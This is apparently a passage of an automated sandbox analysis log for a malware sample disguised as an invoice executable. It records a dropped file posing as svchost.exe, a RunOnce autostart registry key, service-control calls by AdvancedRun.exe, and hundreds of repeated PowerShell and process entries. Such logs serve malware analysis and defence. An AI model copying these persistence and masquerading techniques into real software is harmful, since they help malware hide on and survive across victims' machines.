        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeJump to dropped file

        Boot Survival:

        barindex
        Creates an autostart registry key pointing to binary in C:\WindowsShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
